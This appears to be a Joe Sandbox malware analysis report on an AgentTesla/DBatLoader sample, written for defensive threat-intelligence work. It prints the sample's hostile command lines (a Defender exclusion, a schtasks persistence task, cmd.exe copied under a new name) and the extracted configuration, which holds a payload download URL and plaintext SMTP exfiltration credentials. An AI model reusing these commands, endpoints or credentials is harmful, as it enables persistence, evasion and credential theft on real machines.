Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2jbMIxCFsK.exe

Overview

General Information

Sample name:2jbMIxCFsK.exe
renamed because original name is a hash value
Original sample name:054899796d592bb5f70b0a9fa28429024a919270a76603626be24068faae59d9.exe
Analysis ID:1562866
MD5:67dac6ae9ee770115db85cc71979dc41
SHA1:a708539ebb312329f56f064a8491e4c6e1bd7ce8
SHA256:054899796d592bb5f70b0a9fa28429024a919270a76603626be24068faae59d9
Tags:doganalecmdexeuser-JAMESWT_MHT
Infos:

Detection

AgentTesla, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected DBatLoader
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Infects executable files (exe, dll, sys, html)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 2jbMIxCFsK.exe (PID: 5468 cmdline: "C:\Users\user\Desktop\2jbMIxCFsK.exe" MD5: 67DAC6AE9EE770115DB85CC71979DC41)
    • cmd.exe (PID: 5396 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • esentutl.exe (PID: 5968 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • esentutl.exe (PID: 6520 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
    • esentutl.exe (PID: 2472 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\2jbMIxCFsK.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
      • conhost.exe (PID: 1248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • lxsyrsiW.pif (PID: 320 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • neworigin.exe (PID: 2140 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)
      • server_BTC.exe (PID: 3748 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
        • powershell.exe (PID: 3652 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 3440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 4580 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • schtasks.exe (PID: 892 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 1776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • TrojanAIbot.exe (PID: 1476 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
        • cmd.exe (PID: 2928 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpBC1D.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 6048 cmdline: timeout 6 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • TrojanAIbot.exe (PID: 6208 cmdline: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe MD5: 50D015016F20DA0905FD5B37D7834823)
  • Wisrysxl.PIF (PID: 2944 cmdline: "C:\Users\Public\Libraries\Wisrysxl.PIF" MD5: 67DAC6AE9EE770115DB85CC71979DC41)
    • lxsyrsiW.pif (PID: 6048 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • neworigin.exe (PID: 2164 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)
      • server_BTC.exe (PID: 320 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • Wisrysxl.PIF (PID: 1440 cmdline: "C:\Users\Public\Libraries\Wisrysxl.PIF" MD5: 67DAC6AE9EE770115DB85CC71979DC41)
    • lxsyrsiW.pif (PID: 3652 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • neworigin.exe (PID: 5300 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)
      • server_BTC.exe (PID: 1196 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • TrojanAIbot.exe (PID: 5536 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
{"Download Url": ["https://gxe0.com/yak/233_Wisrysxlfss"]}
{"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\neworigin.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    C:\Users\user\AppData\Local\Temp\neworigin.exeJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      C:\Users\user\AppData\Local\Temp\neworigin.exeINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
      • 0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
      • 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
      • 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
      • 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
      • 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
      • 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
      • 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
      • 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
      SourceRuleDescriptionAuthorStrings
      00000018.00000002.4540086325.000000000290C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000009.00000002.2359317927.00000000026B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000009.00000002.2359317927.00000000026B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            0000001C.00000002.4540497126.0000000002421000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0000001C.00000002.4540497126.0000000002421000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                Click to see the 14 entries
                SourceRuleDescriptionAuthorStrings
                0.2.2jbMIxCFsK.exe.2e60000.2.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
                  9.0.neworigin.exe.240000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    9.0.neworigin.exe.240000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      9.0.neworigin.exe.240000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                      • 0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                      • 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                      • 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                      • 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                      • 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                      • 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                      • 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                      • 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

                      System Summary

                      barindex
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\2jbMIxCFsK.exe, ProcessId: 5468, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\lxsyrsiW.pif, NewProcessName: C:\Users\Public\Libraries\lxsyrsiW.pif, OriginalFileName: C:\Users\Public\Libraries\lxsyrsiW.pif, ParentCommandLine: "C:\Users\user\Desktop\2jbMIxCFsK.exe", ParentImage: C:\Users\user\Desktop\2jbMIxCFsK.exe, ParentProcessId: 5468, ParentProcessName: 2jbMIxCFsK.exe, ProcessCommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, ProcessId: 320, ProcessName: lxsyrsiW.pif
                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Wisrysxl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\2jbMIxCFsK.exe, ProcessId: 5468, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wisrysxl
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 3748, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3652, ProcessName: powershell.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Wisrysxl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\2jbMIxCFsK.exe, ProcessId: 5468, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wisrysxl
                      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\lxsyrsiW.pif, NewProcessName: C:\Users\Public\Libraries\lxsyrsiW.pif, OriginalFileName: C:\Users\Public\Libraries\lxsyrsiW.pif, ParentCommandLine: "C:\Users\user\Desktop\2jbMIxCFsK.exe", ParentImage: C:\Users\user\Desktop\2jbMIxCFsK.exe, ParentProcessId: 5468, ParentProcessName: 2jbMIxCFsK.exe, ProcessCommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, ProcessId: 320, ProcessName: lxsyrsiW.pif
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 3748, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3652, ProcessName: powershell.exe
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ProcessId: 3748, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 3748, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /f, ProcessId: 892, ProcessName: schtasks.exe
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\neworigin.exe, Initiated: true, ProcessId: 2140, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49707
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 3748, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /f, ProcessId: 892, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 3748, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3652, ProcessName: powershell.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-26T08:13:00.554575+010020283713Unknown Traffic192.168.2.549705198.252.105.91443TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 2jbMIxCFsK.exeAvira: detected
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeAvira: detection malicious, Label: TR/Spy.Gen8
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeAvira: detection malicious, Label: HEUR/AGEN.1311721
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeAvira: detection malicious, Label: HEUR/AGEN.1311721
                      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFAvira: detection malicious, Label: HEUR/AGEN.1325995
                      Source: 2jbMIxCFsK.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://gxe0.com/yak/233_Wisrysxlfss"]}
                      Source: 9.0.neworigin.exe.240000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFReversingLabs: Detection: 57%
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeReversingLabs: Detection: 81%
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeReversingLabs: Detection: 91%
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeReversingLabs: Detection: 91%
                      Source: 2jbMIxCFsK.exeReversingLabs: Detection: 57%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFJoe Sandbox ML: detected
                      Source: 2jbMIxCFsK.exeJoe Sandbox ML: detected
                      Source: 2jbMIxCFsK.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: unknownHTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.5:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49736 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49752 version: TLS 1.2
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: lxsyrsiW.pif, 00000008.00000003.2167425399.000000002BD60000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: 2jbMIxCFsK.exe, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D67000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050057116.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2166786184.0000000002226000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000004.00000003.2139143163.0000000005050000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000005.00000003.2144839901.0000000004A20000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbH source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D67000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2143795019.000000002226F000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2143795019.000000002223E000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2173838479.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050057116.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050268749.0000000002C2C000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2166786184.0000000002226000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdb source: esentutl.exe, 00000004.00000003.2139143163.0000000005050000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ping.pdb source: esentutl.exe, 00000005.00000003.2144839901.0000000004A20000.00000004.00001000.00020000.00000000.sdmp

                      Spreading

                      barindex
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E65908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02E65908
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
